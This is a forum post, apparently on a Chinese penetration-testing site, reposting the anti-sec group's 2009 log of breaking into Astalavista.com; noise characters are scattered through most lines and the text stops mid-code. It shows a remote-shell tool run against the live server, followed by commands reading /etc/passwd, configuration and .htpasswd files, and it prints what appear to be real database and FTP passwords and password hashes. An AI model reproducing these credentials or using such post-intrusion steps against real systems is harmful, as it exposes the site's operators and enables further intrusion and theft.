中国网络渗透测试联盟

标题: Astalavista被蹂躏过程 [打印本页]
作者: admin    时间: 2012-11-6 21:07
标题: Astalavista被蹂躏过程
里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。7 p8 p' H1 t* u, m0 z
& E3 ~' T2 y$ s, J6 K
[root@front3 ~]# curl -I litespeedtech.com6 P; b5 i+ V0 N5 P+ B% o4 b
HTTP/1.1 200 OK( W* H: O8 B7 A
Date: Fri, 05 Jun 2009 22:54:51 GMT* N8 R0 T* E" h: N/ ]; X
Server: LiteSpeed8 l: c9 R% [6 V" i0 D/ M1 u( P5 [

  e0 F% n2 Q/ O) o' Y  N+ E另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3  x64还有一个localroot 0day -_-
$ v( K+ j6 ?! e" p- \9 L$ v
( w$ ~* u# ^8 U5 n1 G( p有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
/ _- N9 ^8 _6 ^/ T8 M$ ~. S/ i' N& g  \. ?4 {3 X9 x* o

2 c& f4 O2 ]) {# w! N; t/  _  \  /   _____/\__    ___/  _  \ |    |     /  _  \   \ /   /|   |/   _____/\__    ___/  _  \ ( k4 [6 r" F$ P$ H
/  /_\  \ \_____  \   |    | /  /_\  \|    |    /  /_\  \   Y   / |   |\_____  \   |    | /  /_\  \
. q" ?, c8 v: _/    |    \/        \  |    |/    |    \    |___/    |    \     /  |   |/        \  |    |/    |    \
' ?$ n1 h% m9 O\____|__  /_______  /  |____|\____|__  /_______ \____|__  /\___/   |___/_______  /  |____|\____|__  /
. s: I2 j8 R, G        \/        \/                 \/        \/       \/                     \/                 \/
$ ]0 I; Q4 ]. w* c: J$ m  V                                  The Hacking & Security Community/ u0 Y; M, V( i# l$ h
[+] Founded in 1997 by a hacker computer enthusiast9 t# i% T; u. M8 o" I$ \2 t
[-] Exposed in 2009 by anti-sec group5 w2 i9 a  B0 e% x

6 [1 N' f4 w. K! o- @. j+ ^" uFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:; o* M  c$ K* I& n7 M
>> 03. Who’s behind the site?0 h4 ^3 m2 }" V) _
>>
- J/ ]1 h0 L3 Y. n5 [. u$ |+ K>> A team of security and IT professionals, and a countless number of contributors from all over the world.4 k  l: |' P& {' J
" w( \3 S3 |- O! f
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?) o% V( Q8 r9 \
>>
# h# Y4 L9 X9 z& G- |>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! b; ]* S4 G* s* ~
military institutions.
! ?5 R9 w% H2 d6 }, d; l>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
* ~1 B( b' _# V" D6 O/ h2 ~5 a( u# U4 s. M. u
Why has Astalavista been targeted?
  x4 S' D4 |- i- r5 c6 x+ o+ r/ o
Other than the fact that they are not doing any of this for the “community” but
# t( a. l0 c+ l( x6 Wfor the money, they spread exploits for kids, claim to be a security community3 b! g0 x6 [* v9 E4 w: O
(with no real sense of security on their own servers), and they charge you $6.66' o- t' Q& v5 \! Y" d
per months to access a dead forum with a directory filled with public releases2 E4 S$ T* d2 L# @3 b) ], |! @1 i# x
and outdated / broken services.; m6 f9 B  D0 z7 L

# C, j; k% Z: Q1 T3 eWe wanted to see how good that “team of security and IT professionals” really is.; I: [- d5 Y" \' p- \& c

/ k8 Z$ `+ l: O3 u  c0 e) MLet’s begin.* @( Z3 j; ^! I8 D

% t, H! S% Q4 a# x8 P8 ranti-sec:~# ./g0tshell astalavista.com -p 80( z8 |4 C; H. F0 C& O6 Z
[+] Connecting to astalavista.com:80" @8 u% K6 |0 D1 H* H1 U# w
[+] Grabbing banner…3 E4 K# X( X  o  q9 g1 Y9 A
LiteSpeed7 ?$ `1 v' ~$ S7 P
[+] Injecting shellcode…; ^, p$ ^* U2 C0 @6 x1 B+ r
[-] Wait for it
, E; c; I4 j2 E) i
2 G: a7 P( r6 w5 u1 y) f3 A$ i[~] We g0tshell# e0 U( T3 f. y( O
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux' Q. H$ k' z' K/ u9 M
ID: uid=100(apache) gid=500(apache) groups=500(apache)
  N& E, |4 r9 Q# ?0 ?; y$ ]4 r: D' m  t" o7 f. ]) N
sh-3.2$ cat /etc/passwd
0 W4 t, Q5 }5 z4 M4 Froot:x:0:0:root:/root:/bin/bash5 H# \- }& z9 n+ Q: l
bin:x:1:1:bin:/bin:/sbin/nologin
' x, ^' Z1 i6 g7 gdaemon:x:2:2:daemon:/sbin:/sbin/nologin: I: a- I5 E3 u. F
adm:x:3:4:adm:/var/adm:/sbin/nologin; L( p& F. s1 l
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
1 y% V3 `3 g$ S  E. N! E: Msync:x:5:0:sync:/sbin:/bin/sync
5 }3 J# W: p( L) Nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  [: N8 x! U- K1 ]% J
halt:x:7:0:halt:/sbin:/sbin/halt% i- f8 {5 L1 |: Y
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin* R/ V) i, o9 }
news:x:9:13:news:/etc/news:' C: X. h; K. c( V3 W$ X- X( e
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
' W" j5 f" F- z1 @) T- noperator:x:11:0perator:/root:/sbin/nologin8 I1 v, c- \0 b* ^& V  [
games:x:12:100:games:/usr/games:/sbin/nologin
, H( C8 u+ t+ p0 b) o+ N& ggopher:x:13:30:gopher:/var/gopher:/sbin/nologin1 i4 [: h( E9 s! c% h5 }
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
7 G  ]2 J* Q; ?nobody:x:99:99:Nobody:/:/sbin/nologin
  `+ X  D! L" e8 Grpm:x:37:37::/var/lib/rpm:/sbin/nologin
# Q2 L0 y! ~1 D8 Hdbus:x:81:81:System message bus:/:/sbin/nologin
; ^) D' w5 w3 s3 \9 |* mnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
& l2 |5 O0 F+ K, @4 \9 ~mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin2 b4 w$ R% t  q% y
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin. `, C- k- k) y  h; Y3 r
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
& `6 m' w' [7 W& H! ?9 N$ T* whaldaemon:x:68:68:HAL daemon:/:/sbin/nologin5 B: ^6 \# y, x
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin1 b- q. u% m( ~" `) V+ y
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin3 K; R0 i  E1 Y9 j) p
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin2 k, y2 l. _7 a9 A" _0 q
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin6 R; `: }( m2 r0 P) Y+ K3 H! u, ~
pcap:x:77:77::/var/arpwatch:/sbin/nologin: P% z6 `8 P8 R- U, Z9 `6 n
named:x:25:25:Named:/var/named:/sbin/nologin
( H  {6 X% I; y2 M8 u; M. R6 E# uapache:x:100:500::/var/www:/bin/false+ `3 X  d# e% c# z. k) \# p1 P+ r
diradmin:x:101:101::/usr/local/directadmin:/bin/bash$ }/ L& L$ v; A9 G% H- Q
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash! K. }5 z# d- N9 {9 z. R4 i3 b
webapps:x:500:501::/var/www/html:/bin/bash
' {- m6 q* \5 ]3 i# ?majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash2 l) I9 o  x5 ?
admin:x:501:502::/home/admin:/bin/bash
9 Q7 \2 ~, h4 I% b8 c$ ^) E0 djon:x:502:503::/home/jon:/bin/bash5 h/ P3 V; u  V! I$ Z) k
com:x:503:504::/home/com:/bin/bash  t( ^2 w, N, G0 E3 p6 F
ntp:x:38:38::/etc/ntp:/sbin/nologin6 e2 {; }" f' U+ B/ A. i9 x8 W" a
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
0 u8 V; n4 h( s5 U+ fastanet:x:504:505::/home/astanet:/bin/bash2 _  A4 t" z+ ^, e5 R2 d
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
6 f3 `* p7 D+ J+ b4 Oavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin7 ]2 G2 \. L" t% |% \
9 S% j, g+ v- v% G% Q
sh-3.2$ cat /etc/hosts
0 v  U( \1 K5 h6 m6 r& A7 J# Do not remove the following line, or various programs: K4 ]7 e4 O6 w
# that require network functionality will fail.
. m9 v9 O) p8 j8 ]127.0.0.1       localhost.localdomain   localhost
; W9 r$ h0 W( F, `::1     localhost6.localdomain6 localhost6: d# f( l# I1 }4 u+ ^
80.74.154.172           asta1.astalavistaserver.com! G; [. L+ U% C6 p

* @; F, F# S( x% y- b( r# a1 ?" qsh-3.2$ pwd: U7 o0 Q) t- j! k1 f2 N9 R
/home/com/public_html' y* z$ @8 T+ y& L5 a
& B. f5 u4 i  ^) d
sh-3.2$ ls -la/ s/ K0 V5 v7 s. K( I; g& I5 M( `
total 18460
9 a1 r2 y7 V2 I4 p3 G  M4 Z/ K0 Rdrwxr-xr-x 30 com apache     4096 May 28 17:06 .
& Z0 \! n/ o4 ?drwx–x–x 11 com com        4096 Jun 25  2008 ..* D# r1 o$ B- L) t* M6 x4 F
drwxr-xr-x  2 com com        4096 Feb  2 19:29 admin
  d. D1 ]  F+ H& p) Ddrwxrwxrwx  2 com com    18591744 Jun  4 08:04 cache- u; r% f' {3 m4 \' `' K
drwxr-xr-x  6 com com        4096 Mar 28 21:17 cadmin
8 O& H+ ^9 Y! g4 t2 p7 G: }# B/ H% }drwxrwxrwx  2 com com        4096 May 19 00:50 config2 A3 \/ G8 Z% [2 l5 ]; B; W) |
drwxr-xr-x  2 com com        4096 Mar 20 11:05 core) `8 x3 K9 R+ a' U
drwxr-xr-x 18 com com        4096 Feb  2 19:29 core_modules, c6 i, T6 n0 {8 _$ g' J- G; y
drwxr-xr-x  4 com com        4096 Feb  2 19:29 customizing
) u" C4 T! |6 m% o+ g. |, xdrwxr-xr-x  2 com com        4096 May 11 13:24 customizing_paulo
# \. o! e! H: y( k8 n" {% H( gdrwxr-xr-x  6 com com        4096 Mar 30 12:28 __DELETE__
# U! d2 D) o) M0 l-rw-r–r–  1 com com        8035 May 19 14:26 directory_to_mediadir.php- |- y2 L) N) z3 h2 z8 n9 o
drwxr-xr-x  2 com com        4096 Sep  9  2008 dvd
( s" n/ p$ P; a! p2 U/ T! Wdrwxr-xr-x  3 com com        4096 Feb  2 19:29 editor- D5 y( y0 y0 f; }' l# V$ Y
-rw-r–r–  1 com com        3750 Feb 27 16:12 favicon.ico5 ?5 v& ?4 D% R
drwxrwxrwx  2 com com        4096 Jun  4 08:00 feed
+ `" R2 I  t' j/ N- G* o( Z& D7 j-rwxrwxrwx  1 com com       10736 May 29 12:44 .htaccess
$ m6 x& C' y* M) m6 g( p5 n# }-rw-r–r–  1 com com        7638 Apr 21 08:45 .htaccess.2009-04-21.bak2 @& b- S. t, `( R  K) L, K
-rw-r–r–  1 com com       10768 May 11 11:53 .htaccess.2009-05-11.bak# F8 b& Y! e$ c! B1 t
drwxr-xr-x 18 com com        4096 Apr  9  2008 ideapool
- q2 J2 ~2 m3 }, wdrwxrwxrwx 14 com com        4096 Feb  2 19:29 images
6 K$ z" C6 f# R-rw-r–r–  1 com com       97496 Jun  2 13:01 index.php2 ^6 d  H: O$ Q0 |% d+ Y
drwxr-xr-x  6 com com        4096 Feb  2 19:29 installer6 h; ^- t% i& ]  x$ @
drwxr-xr-x  8 com com        4096 Feb  2 19:29 lang
7 N; I) v0 }' mdrwxr-xr-x 22 com com        4096 Feb  2 19:29 lib
, @0 T; I# \! Y" z8 ^3 D7 j$ }drwxrwxrwx 12 com com        4096 Jun  2 07:47 media
5 J/ Q" H7 {8 zdrwxr-xr-x  8 com com        4096 May 11 12:48 modifications" Y2 ]/ v7 [5 C7 n6 a! v( A
drwxr-xr-x 34 com com        4096 May 28 16:30 modules7 s" d2 d! N9 U% J6 R% `* z
drwxr-xr-x 11 com com        4096 Jan 30 15:00 _myAdmin
* G. z5 H+ D! W2 tdrwxrwxr-x 22 com com        4096 May 28 17:06 _new
9 b6 w& u% ?) m) _* X& ldrwxr-xr-x 26 com com        4096 Feb  2 19:27 _old
7 K+ y, n* z. B7 h6 i8 Z. r: sdrwxr-xr-x  2 com com        4096 Mar 30 12:29 phproxy
  Z2 l) B8 c2 T+ Ndrwxr-xr-x  2 com com        4096 Mar 30 12:30 proxy
0 D& \  W- n4 }* M) y4 @+ o-rw-r–r–  1 com com          26 Feb  2 19:33 robots.txt
  A* {! E  |  s-rwxrwxrwx  1 com com       10844 Jun  2 09:50 sitemap.xml- ~, H1 ^$ {1 p' B
-rw-r–r–  1 com com         223 Mar 30 15:32 test.php  j1 {' y" Z- ]+ e9 w0 Y: h
drwxrwxrwx  8 com com        4096 Mar  6 13:15 themes
6 h1 W" o9 @. t5 }% h# \7 @drwxrwxrwx  3 com com        4096 Jun  4 08:00 tmp3 d! ~! h4 f, n" L8 v
drwxr-xr-x  3 com com        4096 Feb  2 19:33 webcam8 s# P2 {- k4 C2 Q9 Q
9 Z2 ^$ W$ X9 W+ j9 }
sh-3.2$ head -20 index.php
+ @0 D4 @- a6 _<?php
' X; x: ]" [5 [. l3 ], p
* v$ n! x+ x; d; `; f/**, `9 a+ n( s! l3 I& C
* The main page for the CMS
! ~+ ~3 \, k1 y* @copyright   CONTREXX CMS - COMVATION AG7 G1 h& d* w& J+ C& M
* @author      Comvation Development Team9 Z0 n: [7 Z, U* E0 e
* @version     v1.0.9.10.1 stable
4 \( U) p( |) v1 e5 e) l* @package        contrexx$ p2 m+ M3 W+ G- v5 v( |
* @subpackage    core" @8 K# p' Z# e, B' V- a+ c
* @link        链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
# R# E' z" }; y* @since       v0.0.0.0
( z6 }7 T9 q! @' l7 f* @todo        Capitalize all class names in project, ~8 V' r& F3 v) U* b8 W! w
* @uses        /config/configuration.php; @4 ?3 ?9 p( D7 ?( e
* @uses        /config/settings.php
4 i: A& s% n; k; c* @uses        /config/version.php$ S2 N  `, H/ f1 a* l
* @uses        /core/API.php* e  ~0 F6 N) I; m6 c7 V1 H) I
* @uses        /core_modules/cache/index.class.php/ W* L8 V8 M# Z/ |* }
* @uses        /core/error.class.php  D8 B, j- N% b; }  }0 N& I
* @uses        /core_modules/banner/index.class.php7 A' ~9 H8 M! k3 j- t6 c+ G
* @uses        /core_modules/contact/index.class.php
+ Y' R& `& `( q. j' |7 A& [6 ~1 M1 K) d6 t9 R- a- `: M1 U
sh-3.2$ cd config/
" Y$ U' _0 b4 ?$ xsh-3.2$ ls -la
" |; ?' N* i; R- ctotal 32. e- \  H- `. P" T3 i
drwxrwxrwx  2 com com    4096 May 19 00:50 .$ b  ~& G7 Y- z0 K' _
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
: \2 N8 `' N, A2 B, _-rwxrwxrwx  1 com com    2998 May 11 12:29 configuration.php
( p8 |# }. j7 i& _-rwxrwxrwx  1 com com    7610 May 28 17:27 set_constants.php
) Y9 o7 a- D) |2 j-rwxrwxrwx  1 com com    4186 May 25 12:54 settings.php. f: X- a4 ~3 f) U0 s4 n" n
-rwxrwxrwx  1 com com     672 Feb  2 19:29 version.php
. X1 r6 r# |  S* O8 q) Z
& m' v* X, b# M0 S5 tsh-3.2$ cat configuration.php" u- ]. E) `  S* U( P8 y  h
[snip]
3 M8 W: \* D* l% J  E$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
# v4 Z. P4 g4 C7 e, g5 J: S$ ~* [$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
5 A8 a7 h+ P# j- W1 S# W4 G" [$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
! F4 Z* }% X, [. E- G& L. d1 M$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username3 c0 a8 ^' U" v. K
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 `" \+ e4 l; T# l2 G
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)- k+ W1 M( A! A" R8 @- k( p; F
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
) Y6 u5 }+ k8 Z( m4 S' s[snip]# W8 Q' F& a! Y! }3 z  R9 y
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
3 ^7 |6 r) S: D' r( _' r$_FTPCONFIG['use_passive'] = true;      // Use passive ftp mode9 A3 }" O6 S) X4 Y& y
$_FTPCONFIG['host']     = ‘localhost’;// This is normally set to localhost7 w7 S0 b" I+ k
$_FTPCONFIG['port'] = 21; // Ftp remote port
$ M* e1 h+ y0 _! K$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username# G2 ^, S0 f( P% e
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
0 F6 a" f% o& l2 I+ B$ v; ^: \, w$_FTPCONFIG['path']     = ‘/’; // Ftp path to cms
/ n4 M/ w4 \1 P2 Y' }7 \$ z
. x6 E( N4 a; l  A, fsh-3.2$ cd ..
  v3 s9 o5 X" ~9 c8 v4 S  bsh-3.2$ cd dvd/
3 E% q; H8 i; Jsh-3.2$ ls -la6 d; _9 A; S4 ?. x
total 2913780( P$ K( Z  d5 l7 s# R- M5 f
drwxr-xr-x  2 com com          4096 Sep  9  2008 .; h2 X8 C2 L" X/ i, S8 K
drwxr-xr-x 30 com apache       4096 May 28 17:06 ..: [) ~4 l2 U& E, v5 r& I* B8 t  ]; A
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part1.rar! v; D8 r% V: i
-rw-r–r–  1 com com    1050061483 May 16  2008 astalavista_security_toolbox_dvd_2008.part2.rar; o5 W% J5 i" E5 S" G
-rw-r–r–  1 com com     880644069 May 16  2008 astalavista_security_toolbox_dvd_2008.part3.rar1 |% I  ~2 m+ m; S
-rw-r–r–  1 com com           115 Jan 29  2008 .htaccess4 K* i3 `& c/ O- [& a& f

  t# y9 h. L: f1 k4 x; T- e3 \- lsh-3.2$ cat .htaccess
+ B$ o5 o& w& r1 p. u5 j9 SauthType Basic
( h! F  B9 c: b- }* o2 uauthName DVD
7 n& L; B2 n9 c1 M7 Y  JauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd( @7 ~# `  j& e0 e0 V
require valid-user; Z4 ^3 e3 M) L7 P

, g, \9 }7 i) Q5 [* A" I( A9 u' @sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
% C# @5 s, Z& v% e: dDVDdownload:CRD8cuY6.MPT6/ }( R- p% d+ \/ @3 H2 U' |
DVDdownload2:CR8a36.wluFMg
9 f0 g! x; L+ t* [; h1 V8 M0 ]  ^% j% \  }( h
sh-3.2$ cat test.php9 q5 {1 }' O* [1 f8 F1 x6 ?
<?php
- y/ e$ J- v* F" v6 G8 x% I& O$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
- \5 _: D, }! q# {! ~$url = str_replace(array(’&amp;’, ‘&#38;’), ‘&’, base64_decode(rawurldecode($url)));5 X5 G/ Y3 x' q# g% N
echo $url;) r) X( s( E8 R0 ^/ _3 i5 l9 h
?>
, ^: W! b( g. y. W; h! g6 c' z+ \/ w& A0 ~
sh-3.2$ cd modifications/$ N6 c$ l$ v+ B0 C* o5 y* F+ E8 Z
sh-3.2$ ls -la
0 u1 R. ?/ H8 L& l* ?! Ttotal 322 V' k3 i1 m$ }, J: _& p
drwxr-xr-x  8 com com    4096 May 11 12:48 .
) T. X6 ^1 B2 A! J* U0 wdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 m5 \+ @0 C+ `0 H- b9 g+ Z
drwxr-xr-x  3 com com    4096 Feb  2 19:33 com_avtng  _0 y' f3 `4 t: C0 g
drwxr-xr-x  3 com com    4096 May 12 09:26 cronjobs
$ P# w! \% i2 Sdrwxr-xr-x  2 com com    4096 Mar  2 10:35 onlinetools
9 H; r. s% P' a0 pdrwxr-xr-x  4 com com    4096 Feb  2 19:33 pjirc
5 n0 o# s: z; n( u2 @drwxr-xr-x  2 com com    4096 Feb  2 19:33 search$ d# W6 Q1 l; ]% _7 l' X  W
drwxr-xr-x  2 com com    4096 Mar 25 08:56 _tmp
3 T1 S# U+ J7 t& e; n+ F. H' |: r6 b7 N4 h
sh-3.2$ ls -R0 Z, }& s5 X& p$ K4 K# l! T
.:
0 G3 L& `2 e2 v  Fcom_avtng  cronjobs  onlinetools  pjirc  search  _tmp
6 s$ Y& K- o1 Y6 C5 I0 |) e* K, n
. s) y8 L! }, N- P./com_avtng:
. d: v0 X/ Z9 i9 h/ K1 O2 ?/ w6 Bavtng.php  banner_bottom.inc.php  banner_button.inc.php  banner_content.inc.php  banner_popunder.inc.php  banner_right.inc.php  banner_top.inc.php  iframe.php  scripts. d4 W- y, R9 c; v% l; f

& x/ [* n* L& ~3 w6 ?: a./com_avtng/scripts:8 x6 h* P; h3 w5 B. u( v; h
popunder.js
- ~2 G1 ^/ W) s' ^) u# E
" ~2 v! O, f0 A. W" g./cronjobs:1 Y  U' a! r4 l+ ]' m) `  w
exploits.php  exploits.sh  google_blogindexing.php  ip2country.sh  proxydb2.php  proxydb.php  securitynews.php  tmp
0 y# Z) p! q8 T' u
( C5 c: w. h  Z# Q2 a./cronjobs/tmp:' y! |$ X3 x6 Q: ~' Y$ F, f
contrexx_module_onlinetools_defaultports.csv  contrexx_module_onlinetools_geolitecity_country.csv
6 e9 R/ P5 `1 ]2 h+ c; t, T$ A$ Q( p0 [7 o
./onlinetools:( H& |, z9 k0 e3 F1 h5 e$ s
index.php
" P) I2 n% ]1 Z. d" j, L+ x8 ~4 I5 g& ^2 V
./pjirc:8 F* F9 K/ d! h" S) h" a
a_big.jpg          english.lng       img              irc.jar           NormalApplet.html  pixx-french.lng  pjirc.cfg       securedirc-unsigned.cab  thanks.txt
1 ~1 p; c' r+ d% s6 M2 }AppletWithJS.html  french.lng        IRCApplet.class  irc-unsigned.jar  pixx.cab           pixx.jar         readme.txt      SimpleApplet.html        versions.txt9 c4 V& y- T* [/ h+ ^
background.gif     HeavyApplet.html  irc.cab          license.txt       pixx-english.lng   pixx-readme.txt  securedirc.cab  snd5 r' ^' a- P; Z$ A: {
! z$ q6 I. g- V  `2 v
./pjirc/img:, l/ t7 W7 @( p
ange.gif    bombe.gif   clin-oeuil.gif         content.gif  enerve2.gif  garcon.gif     langue.gif  mecontent.gif  ordi.gif       portable.gif   sapin.gif    triste.gif
% ~; z% T! g) u2 p5 karbre.gif   bouche.gif  clin-oeuil-langue.gif  cool.gif     femme.gif    grognon.gif    lettre.gif  newbie.gif     pere-noel.gif  pouce-non.gif  sleep.gif   " c% w4 A+ ~, R) x" Y$ c( _
verre-eau.gif. r  e+ A& L, T; b
argh.gif    bouqin.gif  coeur-brise.gif        diable.gif   fille.gif    halloween.gif  lit.gif     OH-1.gif       pleure.gif     pouce-oui.gif  soleil.gif  
, G4 E# ?+ m/ j8 X% y  D' m3 `verre-vin.gif, `1 O% U3 N1 q& ?$ w# ^
ballon.gif  cadeau.gif  coeur.gif              dwchat.gif   fleur.gif    hamburger.gif  love.gif    OH-2.gif       poisson.gif    roll-eyes.gif  sourire.gif  yinyang.gif
& L  j$ q) }5 B, B6 kbiere.gif   chien.gif   comprends-pas.gif      enerve1.gif  fume.gif     homme.gif      lune.gif    OH-3.gif       pomme.gif      rouge.gif      terre.gif
' p  j, |7 T! q8 l  ]8 f1 ~0 x0 Y0 e4 X: i; i; v# Q
./pjirc/snd:! h! Z; j% E# q
bell2.au  ding.au
! v; h( ~( Y0 R/ J" `0 S: M7 [% p6 z
./search:5 j$ _/ Y5 C4 O+ _
searchEngines.php  search.php
' K2 V" m  j5 t7 R, @  W
; `8 _$ M) a: }- h) e1 I./_tmp:. W: t1 g. n( _
defaultPorts.php  defaultPorts.txt; D/ b; e- ^" Y- J: P+ k

8 B1 N8 R6 W5 h, ~- e0 ]4 n/ E4 @sh-3.2$ cd cronjobs/
/ m( y. p" K+ \6 S8 U. Rsh-3.2$ cat exploits.php4 y9 h# f9 Y$ n. \) m! B5 ?! f
[snip]6 P- |% o/ ^/ I- P% {
$categories   = array();8 ~# Q: I4 z: _" [+ R* Y8 ?
$milw0rmFile  = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;% Y. `1 x! @0 Z; `+ U2 P
$expolits     = file($milw0rmFile);
3 g) f1 o/ f! u6 o3 _  I$comExploits  = array();2 c, l; U$ b% ^9 r/ _
[snip]# h6 u: p- @  A# }: j
// manage data1 _- P1 _( L/ o/ b/ v8 B3 K7 |
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
+ K3 i9 i/ a! x4 {
+ T5 `6 ^! f5 Q5 Y6 G    // get path and title
: j9 M) B# ~- L% V/ C& ^    $expolits[$x] = trim($expolits[$x]);
$ j% L; ?! J6 \: m5 A* \    $path         = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
1 W* H" u- g- V: I    $title        = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);- o0 g- l* }6 e. p; n  y6 y8 h

1 K* R" g3 `' Q1 f8 l    // check if file exists% d$ g! ~+ H7 k* s& u$ p
    if (file_exists($path)) {
+ N# |: d+ {2 V  _, {* s! ]% t8 L0 _7 Q# B
        $text = file_get_contents($path);
  E. m+ p1 x( b) J) L( ~% U# y; \' H  J
        // get content and date6 V; Q* j5 g( W; Z3 h$ v
        //$text = htmlspecialchars($text, ENT_QUOTES);& b& {/ D$ K! I+ g( t4 p
        $tmptext = addslashes(htmlentities($text,  ENT_QUOTES, “UTF-8″));
: y2 r, o1 Y2 J        if ($tmptext != ”) {, n6 e) C) k, R+ V# E8 {
            $text = $tmptext;& G+ Q9 o( A7 ~( x/ p
        } else {8 o+ K4 [) E' N8 h; W& P3 U
            $text = addslashes(htmlentities($text,  ENT_QUOTES));; A1 R* D0 n' j0 g  O
        }* U) v" p; e3 y+ _5 h: P* R
        $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));8 L! l  w) _/ }' h4 K4 ?
        $tmp  = explode('-', $date);
0 Y) b" f5 \. c% l9 R. b3 K        $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));) I% W' `( z1 W; `* E' i+ K
        $cat  = getCategory ($path);; G. U- \+ m' m: C. |* ~
        $ext  = pathinfo(basename($path));( W0 @( V7 k5 \, H1 t
        $ext  = $ext['extension'];% {7 m) v$ D) }) X5 A) ^0 d
        $qStr = ”  p6 p6 v" d3 s- R+ }; y" }4 @
            SELECT  `id`: X# Z, o- |/ T3 ~# E
            FROM    `contrexx_module_exploits`
" I* z: y1 x% P0 s+ B; [3 @            WHERE   `title`  =  ‘” . $title . “‘
( u: N; \: I9 T& _% k            AND     `date`   =  ‘” . $date . “‘. a8 D5 [4 n) T9 R# L7 y- v, h
        “;
6 [; @0 }! E6 q. ^; M4 U        echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
2 j  q" g! v: K& {6 C& h        $q = $_objDB->query($qStr);, C6 ^+ g$ ]' h) E; M. T) [

! V) [) K. E3 A7 m* |        if ($q->numRows() == 0) {
. }9 h1 ~( |& p
2 g2 s+ D  ?5 Z  @            // prepare array7 Q- u8 X  h9 k9 i
            $comExploits[$x]['date']      = $date;7 U% o. t/ f# L% `8 ~
            $comExploits[$x]['title']     = $title;
( [& W4 a  T! |/ g            $comExploits[$x]['author']    = ‘milw0rm’;8 q" j# |0 W6 X3 v' }9 s. {% A
            $comExploits[$x]['text']      = $text;0 t' Q7 x/ S2 e* T" s& X8 I
            $comExploits[$x]['source']    = $ext;' U0 o) _5 R& i* y
            $comExploits[$x]['url1']      = ”;
4 p/ h5 A( r( }! V5 B+ y( r            $comExploits[$x]['url2']      = ”;
% q! ]9 ]/ A' V* T/ ?0 Z: }            $comExploits[$x]['catid']     = $cat;
! V9 s5 V- f+ k7 G$ \5 Y            $comExploits[$x]['lang']      = ‘2′;- p2 \2 o7 z' w9 F, X
            $comExploits[$x]['userid']    = ‘12′;
, T- ~6 }  X& a8 h/ u            $comExploits[$x]['startdate'] = ‘0000-00-00′;% W" S- Y  w6 k) z
            $comExploits[$x]['enddate']   = ‘0000-00-00′;/ Z9 _8 J! N9 Z2 j2 p0 ]
            $comExploits[$x]['status']    = ‘1′;
$ |# `7 z  B$ J. t$ f3 C6 t! m            $comExploits[$x]['changelog'] = $date;
